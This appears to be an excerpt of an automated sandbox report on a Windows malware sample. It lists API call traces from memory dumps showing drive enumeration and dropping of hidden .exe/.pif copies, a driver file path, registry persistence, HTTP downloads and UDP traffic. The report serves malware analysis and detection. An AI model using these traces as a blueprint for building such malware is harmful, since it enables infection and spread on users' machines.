                                    • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0242BF5A
                                    • lstrlen.KERNEL32(024A3F70,?), ref: 0242BF74
                                    • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0242C022
                                    • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0242C040
                                    • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0242C055
                                    • SetEndOfFile.KERNEL32(000000FF), ref: 0242C062
                                    • CloseHandle.KERNEL32(000000FF), ref: 0242C06F
                                    • GlobalFree.KERNEL32(00000000), ref: 0242C096
                                    • DeleteFileA.KERNEL32(00000000), ref: 0242C0A0
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Similarity
                                    • API ID: File$GlobalPointer$AllocCloseCreateDeleteFreeHandleReadWritelstrlen
                                    • String ID: D

                                    APIs
                                    • lstrcpy.KERNEL32(00000000,Software\), ref: 02421819
                                    • GetUserNameA.ADVAPI32(00000000,?), ref: 0242182D
                                    • lstrlen.KERNEL32(?), ref: 02421852
                                    • lstrcat.KERNEL32(?,024A3CBC), ref: 0242186A
                                    • lstrlen.KERNEL32(?), ref: 02421892
                                    • lstrlen.KERNEL32(?), ref: 024218D7
                                    • lstrlen.KERNEL32(?,\%d,?), ref: 02421907
                                    • wsprintfA.USER32 ref: 02421915
                                    • RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?), ref: 02421938
                                    • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 02421955
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Similarity
                                    • API ID: lstrlen$CreateNameOpenUserlstrcatlstrcpywsprintf
                                    • String ID: Software\$\%d

                                    APIs
                                    • Sleep.KERNEL32(0001D4C0), ref: 024253C6
                                    • Sleep.KERNEL32(00001000), ref: 024253D3
                                    • LoadLibraryA.KERNEL32(024A4114), ref: 02425415
                                    • GetProcAddress.KERNEL32(00000000,024A4124), ref: 02425432
                                    • GetProcAddress.KERNEL32(00000000,024A4134), ref: 02425456
                                    • GetProcAddress.KERNEL32(00000000,024A4144), ref: 0242547A
                                    • RtlExitUserThread.NTDLL(00000000), ref: 024255FC
                                    Strings
                                    • C:\Windows\system32\drivers\llkhhn.sys, xrefs: 024255B0
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Similarity
                                    • API ID: AddressProc$Sleep$ExitLibraryLoadThreadUser
                                    • String ID: C:\Windows\system32\drivers\llkhhn.sys

                                    APIs
                                    • Sleep.KERNEL32(00000400), ref: 0242E550
                                    • lstrcpy.KERNEL32(00000000,024A4068), ref: 0242E565
                                    • LoadLibraryA.KERNEL32(00000000), ref: 0242E57C
                                    • GetProcAddress.KERNEL32(00000000,024A4054), ref: 0242E59E
                                    • FreeLibrary.KERNEL32(00000000), ref: 0242E5B9
                                    • lstrcat.KERNEL32(00000000,024A3C08), ref: 0242E5CC
                                    • LoadLibraryA.KERNEL32(00000000), ref: 0242E5D9
                                    • GetProcAddress.KERNEL32(00000000,024A4054), ref: 0242E5FB
                                    • CreateThread.KERNEL32(00000000,00000000,0242DD99,00000000,00000000,00000000), ref: 0242E61E
                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000CC39,00000000,00000000,?), ref: 0242E645
                                    • Sleep.KERNEL32(00000400), ref: 0242E659
                                    • Sleep.KERNEL32(00000400), ref: 0242E67F
                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000CA87,0000005A,00000000,?), ref: 0242E6AB
                                    • Sleep.KERNEL32(00000400), ref: 0242E6C1
                                    • Sleep.KERNEL32(000DBBA0), ref: 0242E6E8
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Similarity
                                    • API ID: Sleep$CreateLibraryThread$AddressLoadProc$Freelstrcatlstrcpy
                                    • String ID: Z

                                    APIs
                                    • SetErrorMode.KERNEL32(00008002), ref: 0242ED52
                                    • WSAStartup.WS2_32(00000002,?), ref: 0242ED61
                                    • RtlInitializeCriticalSection.NTDLL(02434030), ref: 0242ED6C
                                    • RtlInitializeCriticalSection.NTDLL(02434018), ref: 0242ED77
                                    • RtlInitializeCriticalSection.NTDLL(02434050), ref: 0242ED82
                                      • Part of subcall function 0242E6F0: LoadLibraryA.KERNEL32(024A3AAC), ref: 0242E766
                                      • Part of subcall function 0242E6F0: GetProcAddress.KERNEL32(00000000,024A40E0), ref: 0242E789
                                      • Part of subcall function 0242E6F0: GetProcAddress.KERNEL32(00000000,024A40F4), ref: 0242E7A1
                                      • Part of subcall function 0242E6F0: GetProcAddress.KERNEL32(00000000,024A4104), ref: 0242E7BA
                                      • Part of subcall function 0242E6F0: LoadLibraryA.KERNEL32(024A41E8), ref: 0242E7CC
                                      • Part of subcall function 0242E6F0: GetProcAddress.KERNEL32(00000000,024A422C), ref: 0242E7EF
                                      • Part of subcall function 0242E6F0: GetProcAddress.KERNEL32(00000000,024A4204), ref: 0242E808
                                      • Part of subcall function 0242E6F0: GetProcAddress.KERNEL32(00000000,024A4218), ref: 0242E820
                                      • Part of subcall function 0242E6F0: GetProcAddress.KERNEL32(00000000,024A41F4), ref: 0242E839
                                      • Part of subcall function 0242E6F0: RegOpenKeyExA.KERNEL32(80000001,024A3B2C,00000000,000F003F,00000000), ref: 0242E85E
                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000D570,00000000,00000000,00000000), ref: 0242EDA5
                                      • Part of subcall function 024210E5: RtlEnterCriticalSection.NTDLL(02434030), ref: 024210F5
                                      • Part of subcall function 024210E5: RtlLeaveCriticalSection.NTDLL(02434030), ref: 0242117F
                                    • CreateThread.KERNEL32(00000000,00000000,Function_000053B2,00000000,00000000,?), ref: 0242EDCC
                                      • Part of subcall function 024210E5: CloseHandle.KERNEL32(00000000), ref: 02421166
                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000E507,00000000,00000000,?), ref: 0242EDF3
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00003FAA,00000000,00000000,?), ref: 0242EE1A
                                    • CreateThread.KERNEL32(00000000,00000000,Function_000057A0,00000000,00000000,?), ref: 0242EE41
                                      • Part of subcall function 0242F030: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00008000,024A3A34), ref: 0242F067
                                      • Part of subcall function 0242F030: MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00008000,?,0242232C), ref: 0242F08E
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00001189,00000000,00000000,?), ref: 0242EF9E
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00003911,00000000,00000000,?), ref: 0242EFC5
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00003D9B,00000000,00000000,?), ref: 0242EFEC
                                    • Sleep.KERNEL32(00000200), ref: 0242F009
                                      • Part of subcall function 02427C71: MapViewOfFile.KERNEL32(00000264,00000006,00000000,00000000,00015400), ref: 02427CA8
                                      • Part of subcall function 02427C71: UnmapViewOfFile.KERNEL32(?), ref: 02427CD7
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Similarity
                                    • API ID: Create$Thread$AddressProc$CriticalSection$File$InitializeView$LibraryLoad$CloseEnterErrorHandleLeaveMappingModeOpenSleepStartupUnmap
                                    APIs
                                    • Sleep.KERNEL32(00004E20), ref: 0242DF9F
                                    • GetLogicalDrives.KERNEL32 ref: 0242DFAF
                                    • GetDriveTypeA.KERNEL32(?), ref: 0242E032
                                    • lstrcat.KERNEL32(?,024A4094), ref: 0242E058
                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 0242E074
                                    • GetFileTime.KERNEL32(000000FF,?,?,?), ref: 0242E0A9
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0242E0BD
                                    • ReadFile.KERNEL32(?,?,00000FA0,?,00000000), ref: 0242E11F
                                    • CharLowerA.USER32(?), ref: 0242E12C
                                    • lstrlen.KERNEL32(?), ref: 0242E139
                                    • Sleep.KERNEL32(00001B58), ref: 0242E4C8
                                      • Part of subcall function 024242C7: tolower.MSVCRT ref: 0242431E
                                      • Part of subcall function 024242C7: tolower.MSVCRT ref: 02424330
                                    • lstrcpy.KERNEL32(?,00000000), ref: 0242E207
                                    • GetFileAttributesA.KERNEL32(?), ref: 0242E214
                                    • CloseHandle.KERNEL32(?), ref: 0242E226
                                    • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 0242E242
                                    • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 0242E275
                                    • CloseHandle.KERNEL32(000000FF), ref: 0242E282
                                    • SetFileAttributesA.KERNEL32(?,00000007), ref: 0242E291
                                    • CloseHandle.KERNEL32(000000FF), ref: 0242E2AA
                                    • GetFileAttributesA.KERNEL32(?), ref: 0242E2B7
                                    • SetFileAttributesA.KERNEL32(?,00000020), ref: 0242E2D5
                                    • DeleteFileA.KERNEL32(?), ref: 0242E2E2
                                    • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 0242E30D
                                    • GetSystemTime.KERNEL32(?), ref: 0242E32D
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0242E357
                                    • lstrcat.KERNEL32(?,.pif), ref: 0242E3BA
                                    • lstrcat.KERNEL32(?,.exe), ref: 0242E3CE
                                    • lstrlen.KERNEL32(?,?,00000000), ref: 0242E3FA
                                    • WriteFile.KERNEL32(?,?,00000000), ref: 0242E40F
                                    • SetFileTime.KERNEL32(?,?,?,?), ref: 0242E431
                                    • CloseHandle.KERNEL32(?), ref: 0242E43E
                                    • SetFileAttributesA.KERNEL32(?,00000007), ref: 0242E44D
                                    • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 0242E469
                                    • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 0242E49C
                                    • CloseHandle.KERNEL32(000000FF), ref: 0242E4A9
                                    • SetFileAttributesA.KERNEL32(?,00000007), ref: 0242E4B8
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Similarity
                                    • API ID: File$Time$Attributes$CloseHandle$Create$SystemWritelstrcat$Sleeplstrlentolower$CharDeleteDriveDrivesLogicalLowerReadTypelstrcpy
                                    • String ID: :$\
                                    APIs
                                    • RtlEnterCriticalSection.NTDLL(00614318), ref: 004C5C9E
                                    • GlobalAlloc.KERNEL32(00002002,00000000,005BDEE8,?,006142FC,006142FC,004C602A,00000000,00000100,004C5A7D,004C5377,004C1DA3,00000100,004C1D3C,005BDEE8,?), ref: 004C5CF3
                                    • GlobalHandle.KERNEL32(00878470), ref: 004C5CFC
                                    • GlobalUnWire.KERNEL32(00000000), ref: 004C5D05
                                    • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 004C5D17
                                    • GlobalHandle.KERNEL32(00878470), ref: 004C5D2E
                                    • GlobalFix.KERNEL32(00000000), ref: 004C5D35
                                    • RtlLeaveCriticalSection.NTDLL(005BDEE8), ref: 004C5D3B
                                    • GlobalFix.KERNEL32(?), ref: 004C5D4A
                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 004C5D93
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Similarity
                                    • API ID: Global$CriticalSection$AllocHandleLeave$EnterWire
                                    • String ID:
                                    • API String ID: 1877740037-0
                                    APIs
                                    • wsprintfA.USER32 ref: 0242C651
                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0242C673
                                    • RegEnumValueA.KERNEL32(?,00000000,?,000000FF,00000000,00000000,?,000000FF), ref: 0242C6ED
                                    • RegCloseKey.ADVAPI32(?), ref: 0242C781
                                      • Part of subcall function 024242C7: tolower.MSVCRT ref: 0242431E
                                      • Part of subcall function 024242C7: tolower.MSVCRT ref: 02424330
                                    • lstrlen.KERNEL32(?), ref: 0242C71D
                                    • lstrlen.KERNEL32(00000000), ref: 0242C729
                                    • Sleep.KERNEL32(00000400), ref: 0242C76B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlentolower$CloseEnumOpenSleepValuewsprintf
                                    • String ID: %s%s
                                    • API String ID: 3307273590-3252725368
                                    APIs
                                    • GetTickCount.KERNEL32 ref: 02425A24
                                    • GetPrivateProfileStringA.KERNEL32(024A3A44,024A3FBC,00000000,00000000,00000080,024A4014), ref: 02425A50
                                    • lstrlen.KERNEL32(00000000), ref: 02425A5D
                                    • GetTickCount.KERNEL32 ref: 02425A75
                                    • wsprintfA.USER32 ref: 02425AC0
                                    • WritePrivateProfileStringA.KERNEL32(024A3A44,024A3FBC,?,024A4014), ref: 02425AE5
                                    • lstrcpy.KERNEL32(53263431135,00000000), ref: 02425AF7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CountPrivateProfileStringTick$Writelstrcpylstrlenwsprintf
                                    • String ID: 53263431135
                                    • API String ID: 929466507-3709621365
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0242B8E6
                                      • Part of subcall function 02425B02: GetTickCount.KERNEL32 ref: 02425B50
                                      • Part of subcall function 02425B02: GetTickCount.KERNEL32 ref: 02425B71
                                      • Part of subcall function 02425B02: lstrlen.KERNEL32(0242B8F8,024A400C,00000000,?,?,?,?,0242B8F8,00000000), ref: 02425B83
                                      • Part of subcall function 02425B02: wsprintfA.USER32 ref: 02425B8F
                                    • InternetOpenA.WININET(024A3A50,00000001,00000000,00000000,00000000), ref: 0242B95B
                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 0242B98D
                                    • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0242B9C2
                                    • InternetReadFile.WININET(00000000,00000000,00000400,00000000), ref: 0242B9E8
                                    • WriteFile.KERNEL32(000000FF,00000000,00000000,00000104,00000000), ref: 0242BA30
                                    • CloseHandle.KERNEL32(?), ref: 0242BAA0
                                    • InternetCloseHandle.WININET(00000000), ref: 0242BAB6
                                    • InternetCloseHandle.WININET(00000000), ref: 0242BACC
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseFileHandle$CountOpenTick$CreateReadWritelstrcpylstrlenwsprintf
                                    • String ID:
                                    • API String ID: 999627789-0
                                    APIs
                                      • Part of subcall function 0242F030: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00008000,024A3A34), ref: 0242F067
                                      • Part of subcall function 0242F030: MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00008000,?,0242232C), ref: 0242F08E
                                    • Sleep.KERNEL32(000493E0,00000001), ref: 02423DFE
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00003B41,00000000,00000000,00000000), ref: 02423E78
                                    • Sleep.KERNEL32(00000200), ref: 02423E8C
                                    • Sleep.KERNEL32(00000100), ref: 02423EA0
                                    • Sleep.KERNEL32(00000100), ref: 02423ECA
                                    • Sleep.KERNEL32(00000400), ref: 02423EE2
                                    • Sleep.KERNEL32(00000400), ref: 02423F04
                                    • Sleep.KERNEL32(00249F00,00000000), ref: 02423F21
                                    • RtlExitUserThread.NTDLL(00000000), ref: 02423F2E
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$CreateFileThread$ExitMappingUserView
                                    • String ID:
                                    • API String ID: 2742488253-0
                                    APIs
                                    • socket.WS2_32(00000002,00000002,00000011), ref: 02423008
                                    • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 02423072
                                    • select.WS2_32(?,00000000,00000000,00000000,0000000F), ref: 0242314A
                                    • recvfrom.WS2_32(?,?,00001000,00000000,?,00000010), ref: 02423179
                                    • closesocket.WS2_32(?), ref: 024232C6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: closesocketrecvfromselectsendtosocket
                                    • String ID: @
                                    • API String ID: 4198204009-2766056989
                                    APIs
                                    • RegOpenKeyExA.KERNEL32(024253F7,024A47E0,00000000,000F003F,024253F7), ref: 02424408
                                    • RegEnumValueA.KERNEL32(024253F7,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0242443F
                                    • RegDeleteValueA.KERNEL32(024253F7,?), ref: 02424468
                                    • RegEnumKeyExA.KERNEL32(024253F7,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 024244A0
                                    • wsprintfA.USER32 ref: 024244D3
                                    • RegDeleteKeyA.ADVAPI32(024253F7,?), ref: 024244FA
                                    • RegCloseKey.ADVAPI32(024253F7), ref: 02424517
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteEnumValue$CloseOpenwsprintf
                                    • String ID:
                                    • API String ID: 2321319729-0
                                    APIs
                                    • RegOpenKeyExA.KERNEL32(80000001,024A3DA8,00000000,000F003F,?,?), ref: 0242DC9D
                                    • RegSetValueExA.KERNELBASE(?,024A3DE4,00000000,00000004,00000002,00000004), ref: 0242DCCB
                                    • RegCloseKey.KERNEL32(?), ref: 0242DCD8
                                    • lstrcpy.KERNEL32(00000000,024A3EAC), ref: 0242DD33
                                    • lstrcat.KERNEL32(00000000,024A3EA4), ref: 0242DD46
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenValuelstrcatlstrcpy
                                    • String ID: >
                                    • API String ID: 1115058322-325317158
                                    APIs
                                    • Sleep.KERNEL32(0002BF20), ref: 02424036
                                      • Part of subcall function 024213E8: InterlockedExchange.KERNEL32(024340B8,?), ref: 02421406
                                    • Sleep.KERNEL32 ref: 02424055
                                    • lstrcpy.KERNEL32(00000000,?), ref: 0242418D
                                    • Sleep.KERNEL32(010B0023), ref: 024242A0
                                    • Sleep.KERNEL32(001B7740), ref: 024242AD
                                    • RtlExitUserThread.NTDLL(00000000), ref: 024242BA
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$ExchangeExitInterlockedThreadUserlstrcpy
                                    • String ID:
                                    • API String ID: 2174692278-0
                                    APIs
                                    • RegOpenKeyExA.KERNEL32(00000001,?,00000000,000F003F,?), ref: 0242DBEC
                                    • RegSetValueExA.KERNEL32(?,00000001,00000000,00000004,00000001,00000004), ref: 0242DC08
                                    • RegCloseKey.ADVAPI32(?), ref: 0242DC12
                                    • RegCreateKeyA.ADVAPI32(00000001,?,?), ref: 0242DC26
                                    • RegSetValueExA.KERNEL32(?,00000001,00000000,00000004,00000001,00000004), ref: 0242DC42
                                    • RegCloseKey.ADVAPI32(?), ref: 0242DC4C
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseValue$CreateOpen
                                    • String ID:
                                    • API String ID: 2738932338-0
                                    APIs
                                    • LoadLibraryA.KERNEL32(?), ref: 024ABE12
                                    • GetProcAddress.KERNEL32(?,024A8FF9), ref: 024ABE30
                                    • ExitProcess.KERNEL32(?,024A8FF9), ref: 024ABE41
                                    • VirtualProtect.KERNEL32(02420000,00001000,00000004,?,00000000), ref: 024ABE8F
                                    • VirtualProtect.KERNEL32(02420000,00001000), ref: 024ABEA4
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                    • String ID:
                                    • API String ID: 1996367037-0
                                    APIs
                                    • IsWindow.USER32(?), ref: 004328AC
                                    • SendMessageA.USER32(?,00008003,00000000,00000000), ref: 004328C3
                                    • GetWindowRect.USER32(?,00000000), ref: 00432915
                                    • GetClientRect.USER32(?,00000000), ref: 0043296D
                                    • GetWindowRect.USER32(?,00000000), ref: 00432991
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: RectWindow$ClientMessageSend
                                    • String ID:
                                    • API String ID: 1071774122-0
                                    APIs
                                    • InterlockedIncrement.KERNEL32(024340C0), ref: 02423B80
                                    • htons.WS2_32(?), ref: 02423BD2
                                      • Part of subcall function 02422FA0: socket.WS2_32(00000002,00000002,00000011), ref: 02423008
                                      • Part of subcall function 02422FA0: sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 02423072
                                      • Part of subcall function 02422FA0: select.WS2_32(?,00000000,00000000,00000000,0000000F), ref: 0242314A
                                    • GetTickCount.KERNEL32 ref: 02423C36
                                      • Part of subcall function 02422FA0: recvfrom.WS2_32(?,?,00001000,00000000,?,00000010), ref: 02423179
                                      • Part of subcall function 02422FA0: closesocket.WS2_32(?), ref: 024232C6
                                    • InterlockedDecrement.KERNEL32(024340C0), ref: 02423D01
                                    • RtlExitUserThread.NTDLL(00000000), ref: 02423D09
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Interlocked$CountDecrementExitIncrementThreadTickUserclosesockethtonsrecvfromselectsendtosocket
                                    • String ID:
                                    • API String ID: 1469894868-0
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000009,?), ref: 0242CB75
                                    • RegEnumValueA.KERNEL32(?,00000000,00000000,00000100,00000000,00000000,00000000,00000000), ref: 0242CBB2
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 0242CBDB
                                    • Sleep.KERNEL32(00000100), ref: 0242CC11
                                    • RegCloseKey.ADVAPI32(?), ref: 0242CC2E
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AttributesCloseEnumFileOpenSleepValue
                                    • String ID:
                                    • API String ID: 684116133-0
                                    APIs
                                    • GlobalAlloc.KERNEL32(00000040,00015000), ref: 0242D59D
                                      • Part of subcall function 02427C71: MapViewOfFile.KERNEL32(00000264,00000006,00000000,00000000,00015400), ref: 02427CA8
                                      • Part of subcall function 02427C71: UnmapViewOfFile.KERNEL32(?), ref: 02427CD7
                                    • GlobalFree.KERNELBASE(?), ref: 0242D5E5
                                    • Sleep.KERNEL32(00002800), ref: 0242D6C0
                                    • RtlExitUserThread.NTDLL(00000000), ref: 0242D6E3
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileGlobalView$AllocExitFreeSleepThreadUnmapUser
                                    • String ID:
                                    • API String ID: 2983513495-0
                                    APIs
                                    • SendMessageA.USER32(?,00000080,00000001,?), ref: 0042E208
                                    • SendMessageA.USER32(?,00000080,00000000,?), ref: 0042E21A
                                    • DestroyCursor.USER32(?), ref: 0042E22D
                                    • DestroyCursor.USER32(?), ref: 0042E23A
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CursorDestroyMessageSend
                                    • String ID:
                                    • API String ID: 3501257726-0
                                    APIs
                                    • wsprintfA.USER32 ref: 024219A6
                                    • lstrcpy.KERNEL32(?,00000000), ref: 02421A54
                                    • lstrcpy.KERNEL32(?,00000000), ref: 02421A7B
                                    • RegSetValueExA.KERNEL32(?,?,00000000,00000004,?,00000004), ref: 02421AA5
                                    • lstrlen.KERNEL32(?), ref: 02421AB4
                                    • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,00000000), ref: 02421AD4
                                    • RegCloseKey.KERNEL32(?), ref: 02421AE6
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Valuelstrcpy$Closelstrlenwsprintf
                                    • String ID:
                                    • API String ID: 3050549977-0
                                    APIs
                                    • SendMessageA.USER32(?,00000030,?,00000001), ref: 0047F931
                                    • SendMessageA.USER32(?,00000030,?,00000001), ref: 0047F949
                                    • GetStockObject.GDI32(00000011), ref: 0047F953
                                    • SendMessageA.USER32(?,00000030,00000000,00000001), ref: 0047F973
                                      • Part of subcall function 00413AE0: CreateFontIndirectA.GDI32 ref: 00413B29
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
